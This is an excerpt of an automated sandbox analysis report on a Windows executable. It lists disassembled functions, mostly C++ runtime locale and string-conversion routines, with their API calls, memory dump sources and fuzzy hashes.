                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1711917922-0
                                                                                                                                                                        • Opcode ID: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                        • Instruction ID: 82ebb737f07b9d010b3bc32882871e1815436d636fe440871af8564dce385893
                                                                                                                                                                        • Opcode Fuzzy Hash: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                        • Instruction Fuzzy Hash: BB517C70E01218EBDB10DF99D984BEEBBB8FF49724F244219E914B72C0C7746D05ABA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4BBC4
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1538362411-2891247106
                                                                                                                                                                        • Opcode ID: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                        • Instruction ID: e6abb3e4fd18c136239eabd5c1276cf6818dfd4b1aecbc5c046de47add80a0fe
                                                                                                                                                                        • Opcode Fuzzy Hash: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                        • Instruction Fuzzy Hash: 41B1907290410AABDF19DFA8CD65EFE3FB9EB44324F044119FE0AA2252D731DA11EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F50C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F50CA4
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                                                                                        • Opcode ID: f7eb8dfdac74f1bbdbd8401c34a7eb9b6f2cbbaf7d36eabda78b676c8742087c
                                                                                                                                                                        • Instruction ID: c75f0dbfbf8fa8fddf625f13d2ad7952ef678ec7291ec286d8538cb382d56dcb
                                                                                                                                                                        • Opcode Fuzzy Hash: f7eb8dfdac74f1bbdbd8401c34a7eb9b6f2cbbaf7d36eabda78b676c8742087c
                                                                                                                                                                        • Instruction Fuzzy Hash: 51B1B17290010AABCF19DF68CD5AEFE3BB9FB04311F144519FF06A6291DA31DA18EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4BF85
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                                                                                        • Opcode ID: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                        • Instruction ID: 9ead19fed08a8fdb1497c524924c037bf4e41722e0c44711b4458c8305ff9d6a
                                                                                                                                                                        • Opcode Fuzzy Hash: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                        • Instruction Fuzzy Hash: BDB1BE7290110AAFCF59DFA8CD55EBE3FB9FB09750F045119FE02A2252D671CA10EBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F48555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4855C
                                                                                                                                                                        • _Maklocstr.LIBCPMT ref: 00F485C5
                                                                                                                                                                        • _Maklocstr.LIBCPMT ref: 00F485D7
                                                                                                                                                                        • _Maklocchr.LIBCPMT ref: 00F485EF
                                                                                                                                                                        • _Maklocchr.LIBCPMT ref: 00F485FF
                                                                                                                                                                        • _Getvals.LIBCPMT ref: 00F48621
                                                                                                                                                                          • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D03
                                                                                                                                                                          • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D19
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 3549167292-2658103896
                                                                                                                                                                        • Opcode ID: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                        • Instruction ID: 588514ab6ab5b5f141be3aefe4244f55706b0eb5a6e63e801b77c538e44ce5f3
                                                                                                                                                                        • Opcode Fuzzy Hash: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                        • Instruction Fuzzy Hash: 682181B2D00308ABDF14EFA4DC85ACE7FA8BF05750F048116BD149F142DA74DA44DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F39730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 00F39763
                                                                                                                                                                          • Part of subcall function 00F40C94: __EH_prolog3.LIBCMT ref: 00F40C9B
                                                                                                                                                                          • Part of subcall function 00F40C94: std::_Lockit::_Lockit.LIBCPMT ref: 00F40CA6
                                                                                                                                                                          • Part of subcall function 00F40C94: std::locale::_Setgloballocale.LIBCPMT ref: 00F40CC1
                                                                                                                                                                          • Part of subcall function 00F40C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00F40D17
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3978A
                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F397F0
                                                                                                                                                                        • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00F3984A
                                                                                                                                                                          • Part of subcall function 00F3F57A: __EH_prolog3.LIBCMT ref: 00F3F581
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F5C8
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F620
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F654
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F6A8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,?,00F854B1,00000000), ref: 00F399BF
                                                                                                                                                                        • __cftoe.LIBCMT ref: 00F39B0B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                        • API String ID: 3103716676-1405518554
                                                                                                                                                                        • Opcode ID: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                        • Instruction ID: ad4d5a2b5b65444f2e27e101a847a8cee1e8e73eea8c52f9e07eacad384884e5
                                                                                                                                                                        • Opcode Fuzzy Hash: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 74F1BF71D05249DFDF10CFA8C884BEEBBB1EF49324F144169E805AB381E7B59A04DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F33C20 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F336D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                          • Part of subcall function 00F336D0: _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00F33CA8
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D01
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D7A
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00F33EB1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F33F34
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F33F7B
                                                                                                                                                                        Strings
                                                                                                                                                                        • NtQueryInformationProcess, xrefs: 00F33CA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                        • String ID: NtQueryInformationProcess
                                                                                                                                                                        • API String ID: 566592816-2781105232
                                                                                                                                                                        • Opcode ID: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                        • Instruction ID: 5690857886921a815558a381850d5c42216fb4d397252b98f4d44c780e33e2a8
                                                                                                                                                                        • Opcode Fuzzy Hash: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                        • Instruction Fuzzy Hash: 34A14B70D04749DEDB20DF64CC49BAEBBF0BF48724F204599D449A7280E7B9AA88DF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F340B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,40000022,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,72A902E8,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,72A902E8,?,?,?), ref: 00F342D2
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,72A902E8,?,?,?), ref: 00F342F3
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34326
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34337
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34355
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34371
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1424318461-0
                                                                                                                                                                        • Opcode ID: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                        • Instruction ID: 22d7f7f69cf39c90cfcec02d88a68a9c1fa73a787f58570ac840598d7a3d1efd
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                        • Instruction Fuzzy Hash: E9819E71E006099FDB14DFA8D985BAEBBB5FB48320F244229E925F73D0D770B9409B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00F526F8
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52786
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F527B0
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F527F8
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52812
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F52838
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F52875
                                                                                                                                                                        • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00F52892
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3603178046-0
                                                                                                                                                                        • Opcode ID: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                        • Instruction ID: 3e72a4db479708860f5deb3043dc3c92a3b20532f8d16fca13cf0b3ea7bbddd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E71A732D002099FDF619FA4DC85AEE7BB5EF4B362F18021AEE04A7151D735C848E760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00F521A3
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F521CF
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00F5220E
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5222B
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00F5226A
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F52287
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F522C9
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F522EC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                        • Opcode ID: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                        • Instruction ID: 3744f145cd87e835538b775c13bbe67b4f70199aaa94301ab7e04887710d0381
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                        • Instruction Fuzzy Hash: C951C37290020AAFEB605F64CC45FAF7BA9EF46752F114228FF15E6150D734CD18ABA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F38610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000044,00000000,72A902E8,?,00000000), ref: 00F386F9
                                                                                                                                                                        • __Getctype.LIBCPMT ref: 00F3877B
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F387E4
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2372200979-0
                                                                                                                                                                        • Opcode ID: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                        • Instruction ID: b5f8295f726968265ab1a5141a1f251ef31af0b8b19667028acd7231cf5040b2
                                                                                                                                                                        • Opcode Fuzzy Hash: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3861C471C00748DFDB11CF68C9407AABBF0EF14364F148159E845AB291EB78AE45EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F39270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000018,00000000,72A902E8,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00F39342
                                                                                                                                                                        • __Getctype.LIBCPMT ref: 00F393BD
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F393F8
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
